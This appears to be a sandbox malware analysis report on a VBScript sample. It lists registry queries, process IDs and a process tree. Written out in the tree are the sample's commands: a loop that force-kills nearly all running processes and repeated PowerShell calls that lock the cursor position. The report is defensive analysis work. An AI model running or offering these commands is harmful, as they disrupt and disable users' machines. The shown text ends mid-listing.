32ebdb5eb8be7401acac75f791e9a018a96329179ddae30963e1cde6fcf84d8a

Analysis

max time kernel
135s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24/08/2024, 08:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

code.vbs
Size

1KB
MD5

10e6ce0cef8e5e4d696abce1935848b2
SHA1

39cad1402cfecb68cdd9ad8a0255ad90e2989387
SHA256

32ebdb5eb8be7401acac75f791e9a018a96329179ddae30963e1cde6fcf84d8a
SHA512

1d1f0eb5f3d76327f1f2bb3e6e4191b4488510199c92deccd641a41502d83847e1fe8aaa080860153bedc687f8ed454d580872aa9da4303924245ddbcadcb745

Score

7^/10

discovery execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
8160	powershell.exe
8484	powershell.exe
8512	powershell.exe
9916	powershell.exe
3680	powershell.exe
700	powershell.exe
5980	powershell.exe
5740	powershell.exe
10028	powershell.exe
4568	powershell.exe
6160	powershell.exe
4856	powershell.exe
7316	powershell.exe
5312	powershell.exe
4924	powershell.exe
4848	powershell.exe
428	powershell.exe
5064	powershell.exe
4332	powershell.exe
8916	powershell.exe
8744	powershell.exe
2252	powershell.exe
5640	powershell.exe
6840	powershell.exe
7928	powershell.exe
7624	powershell.exe
8808	powershell.exe
9204	powershell.exe
6448	powershell.exe
6912	powershell.exe
7716	powershell.exe
6872	powershell.exe
8228	powershell.exe
9208	powershell.exe
1452	powershell.exe
7344	powershell.exe
7472	powershell.exe
952	powershell.exe
8308	powershell.exe
10116	powershell.exe
2908	powershell.exe
9152	powershell.exe
2060	powershell.exe
1220	powershell.exe
4116	powershell.exe
9012	powershell.exe
9300	powershell.exe
1800	powershell.exe
3244	powershell.exe
6496	powershell.exe
7684	powershell.exe
3860	powershell.exe
5464	powershell.exe
6924	powershell.exe
9736	powershell.exe
4236	powershell.exe
5580	powershell.exe
9540	powershell.exe
7032	powershell.exe
1076	powershell.exe
2728	powershell.exe
5000	powershell.exe
10116	powershell.exe
700	powershell.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
5032	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dwm.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
3220	taskkill.exe
3020	taskkill.exe
2364	taskkill.exe
2912	taskkill.exe
3140	taskkill.exe
3540	taskkill.exe
2992	taskkill.exe
4568	taskkill.exe
2456	taskkill.exe
4248	taskkill.exe
4012	taskkill.exe
3832	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies data under HKEY_USERS 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe

Modifies registry class 22 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
952	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5032	tasklist.exe
5032	tasklist.exe
1076	powershell.exe
1076	powershell.exe
1452	powershell.exe
1452	powershell.exe
4568	powershell.exe
4568	powershell.exe
1800	powershell.exe
1800	powershell.exe
2060	powershell.exe
2060	powershell.exe
4848	powershell.exe
4848	powershell.exe
428	powershell.exe
428	powershell.exe
1076	powershell.exe
1076	powershell.exe
4236	powershell.exe
4236	powershell.exe
3860	powershell.exe
3860	powershell.exe
3680	powershell.exe
3680	powershell.exe
700	powershell.exe
700	powershell.exe
1452	powershell.exe
1452	powershell.exe
4568	powershell.exe
4568	powershell.exe
5064	powershell.exe
5064	powershell.exe
1800	powershell.exe
1800	powershell.exe
4116	powershell.exe
4116	powershell.exe
4332	powershell.exe
4332	powershell.exe
2252	powershell.exe
2252	powershell.exe
1220	powershell.exe
1220	powershell.exe
2728	powershell.exe
2728	powershell.exe
2060	powershell.exe
2060	powershell.exe
3244	powershell.exe
3244	powershell.exe
952	powershell.exe
952	powershell.exe
5000	powershell.exe
5000	powershell.exe
4848	powershell.exe
4848	powershell.exe
2908	powershell.exe
2908	powershell.exe
428	powershell.exe
428	powershell.exe
5464	powershell.exe
5464	powershell.exe
5580	powershell.exe
5580	powershell.exe
4236	powershell.exe
4236	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3516	WScript.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5032	tasklist.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeCreateGlobalPrivilege	3112	dwm.exe
Token: SeChangeNotifyPrivilege	3112	dwm.exe
Token: 33	3112	dwm.exe
Token: SeIncBasePriorityPrivilege	3112	dwm.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	4248	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	3540	taskkill.exe
Token: SeDebugPrivilege	2992	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	5000	powershell.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	5464	powershell.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeDebugPrivilege	5740	powershell.exe
Token: SeDebugPrivilege	5640	powershell.exe
Token: SeDebugPrivilege	6160	powershell.exe
Token: SeDebugPrivilege	6448	powershell.exe
Token: SeDebugPrivilege	6840	powershell.exe
Token: SeDebugPrivilege	6496	powershell.exe
Token: SeDebugPrivilege	6924	powershell.exe
Token: SeDebugPrivilege	7032	powershell.exe
Token: SeDebugPrivilege	6912	powershell.exe
Token: SeDebugPrivilege	7684	powershell.exe
Token: SeDebugPrivilege	8160	powershell.exe
Token: SeDebugPrivilege	7316	powershell.exe
Token: SeDebugPrivilege	7472	powershell.exe
Token: SeDebugPrivilege	7344	powershell.exe
Token: SeDebugPrivilege	7716	powershell.exe
Token: SeDebugPrivilege	7928	powershell.exe
Token: SeDebugPrivilege	6872	powershell.exe
Token: SeDebugPrivilege	7624	powershell.exe
Token: SeDebugPrivilege	5312	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	8228	powershell.exe
Token: SeDebugPrivilege	8512	powershell.exe
Token: SeDebugPrivilege	8484	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4996	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3516 wrote to memory of 952	3516	WScript.exe	84
PID 3516 wrote to memory of 952	3516	WScript.exe	84
PID 3516 wrote to memory of 1940	3516	WScript.exe	93
PID 3516 wrote to memory of 1940	3516	WScript.exe	93
PID 1940 wrote to memory of 1808	1940	cmd.exe	95
PID 1940 wrote to memory of 1808	1940	cmd.exe	95
PID 1808 wrote to memory of 5032	1808	cmd.exe	96
PID 1808 wrote to memory of 5032	1808	cmd.exe	96
PID 1808 wrote to memory of 5104	1808	cmd.exe	97
PID 1808 wrote to memory of 5104	1808	cmd.exe	97
PID 1940 wrote to memory of 3220	1940	cmd.exe	98
PID 1940 wrote to memory of 3220	1940	cmd.exe	98
PID 1940 wrote to memory of 4568	1940	cmd.exe	99
PID 1940 wrote to memory of 4568	1940	cmd.exe	99
PID 1940 wrote to memory of 3020	1940	cmd.exe	100
PID 1940 wrote to memory of 3020	1940	cmd.exe	100
PID 1940 wrote to memory of 2456	1940	cmd.exe	103
PID 1940 wrote to memory of 2456	1940	cmd.exe	103
PID 1940 wrote to memory of 4248	1940	cmd.exe	105
PID 1940 wrote to memory of 4248	1940	cmd.exe	105
PID 1940 wrote to memory of 4012	1940	cmd.exe	106
PID 1940 wrote to memory of 4012	1940	cmd.exe	106
PID 1940 wrote to memory of 2912	1940	cmd.exe	107
PID 1940 wrote to memory of 2912	1940	cmd.exe	107
PID 1940 wrote to memory of 3140	1940	cmd.exe	109
PID 1940 wrote to memory of 3140	1940	cmd.exe	109
PID 1940 wrote to memory of 2364	1940	cmd.exe	111
PID 1940 wrote to memory of 2364	1940	cmd.exe	111
PID 1940 wrote to memory of 3540	1940	cmd.exe	112
PID 1940 wrote to memory of 3540	1940	cmd.exe	112
PID 1940 wrote to memory of 2992	1940	cmd.exe	113
PID 1940 wrote to memory of 2992	1940	cmd.exe	113
PID 1940 wrote to memory of 3832	1940	cmd.exe	114
PID 1940 wrote to memory of 3832	1940	cmd.exe	114
PID 3516 wrote to memory of 3024	3516	WScript.exe	115
PID 3516 wrote to memory of 3024	3516	WScript.exe	115
PID 3516 wrote to memory of 4568	3516	WScript.exe	116
PID 3516 wrote to memory of 4568	3516	WScript.exe	116
PID 3516 wrote to memory of 1076	3516	WScript.exe	117
PID 3516 wrote to memory of 1076	3516	WScript.exe	117
PID 3516 wrote to memory of 1452	3516	WScript.exe	119
PID 3516 wrote to memory of 1452	3516	WScript.exe	119
PID 3516 wrote to memory of 1800	3516	WScript.exe	122
PID 3516 wrote to memory of 1800	3516	WScript.exe	122
PID 3516 wrote to memory of 2060	3516	WScript.exe	124
PID 3516 wrote to memory of 2060	3516	WScript.exe	124
PID 3516 wrote to memory of 4848	3516	WScript.exe	126
PID 3516 wrote to memory of 4848	3516	WScript.exe	126
PID 3516 wrote to memory of 428	3516	WScript.exe	128
PID 3516 wrote to memory of 428	3516	WScript.exe	128
PID 3516 wrote to memory of 3860	3516	WScript.exe	130
PID 3516 wrote to memory of 3860	3516	WScript.exe	130
PID 3516 wrote to memory of 4236	3516	WScript.exe	132
PID 3516 wrote to memory of 4236	3516	WScript.exe	132
PID 3516 wrote to memory of 3680	3516	WScript.exe	134
PID 3516 wrote to memory of 3680	3516	WScript.exe	134
PID 3516 wrote to memory of 700	3516	WScript.exe	136
PID 3516 wrote to memory of 700	3516	WScript.exe	136
PID 3516 wrote to memory of 5064	3516	WScript.exe	139
PID 3516 wrote to memory of 5064	3516	WScript.exe	139
PID 3516 wrote to memory of 1220	3516	WScript.exe	141
PID 3516 wrote to memory of 1220	3516	WScript.exe	141
PID 3516 wrote to memory of 4116	3516	WScript.exe	143
PID 3516 wrote to memory of 4116	3516	WScript.exe	143

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.vbs"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3516
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\note.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:952
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c for /f "tokens=1 delims= " %a in ('tasklist /v ^| findstr /i /v "N/A"') do taskkill /f /pid %a >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c tasklist /v | findstr /i /v "N/A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\system32\tasklist.exe
      tasklist /v
      4⤵
      Enumerates processes with tasklist
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5032
  - - C:\Windows\system32\findstr.exe
      findstr /i /v "N/A"
      4⤵
      PID:5104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid Image
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3220
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid =========================
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid dwm.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid taskhostw.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid dllhost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid StartMenuExperienceHost.e
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid SearchApp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid TextInputHost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3140
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid notepad.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid RuntimeBroker.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid dllhost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /pid cmd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msg.vbs"
  2⤵
  PID:3024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
